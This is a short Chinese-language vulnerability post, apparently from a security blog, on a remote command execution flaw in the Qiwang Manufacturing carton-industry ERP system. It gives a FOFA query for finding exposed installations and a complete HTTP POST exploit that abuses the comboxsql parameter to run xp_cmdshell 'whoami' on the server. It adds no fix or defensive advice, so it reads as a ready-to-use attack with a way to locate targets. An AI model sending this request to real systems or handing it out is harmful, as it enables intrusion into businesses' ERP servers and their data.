企望制造ERP系统存在RCE漏洞

漏洞描述

企望制造纸箱业erp系统由深知纸箱行业特点和业务流程的多位IT专家打造,具有国际先进的管理方式,将现代化的管理方式融入erp软件中,让企业分分钟就拥有科学的管理经验。erp的功能包括成本核算、报价定价、订单下达、生产下单、现场管理等多种功能。

漏洞复现

FOFA

复制代码
title="企望制造ERP系统"

POC

复制代码
POST /mainFunctions/comboxstore.action HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=11E0339EEFC982D1B2E80005DD204F4F
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

comboxsql=exec%20xp_cmdshell%20'whoami'

bp 成功执行命令

相关推荐
独行soc1 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Me4神秘2 小时前
Linux国产与国外进度对垒
linux·服务器·安全
老K(郭云开)3 小时前
谷歌浏览器安全输入控件-allWebSafeInput控件
安全
Whoisshutiao3 小时前
网安-XSS-pikachu
前端·安全·网络安全
还是奇怪4 小时前
Linux - 安全排查 2
linux·运维·安全
扫描电镜4 小时前
半导体制造中的扫描电镜:从工艺诊断到失效分析
制造·扫描电镜·扫描电子显微镜·国产扫描电镜·失效分析
Clownseven10 小时前
云端备份与恢复策略:企业如何选择最安全的备份解决方案
安全
薄荷椰果抹茶12 小时前
【网络安全基础】第六章---Web安全需求
安全·web安全
HumanRisk20 小时前
降低网络安全中的人为风险:以人为本的路径
网络·安全·web安全
运维开发王义杰20 小时前
金融安全生命线:用AWS EventBridge和CloudTrail构建主动式入侵检测系统
安全·金融·aws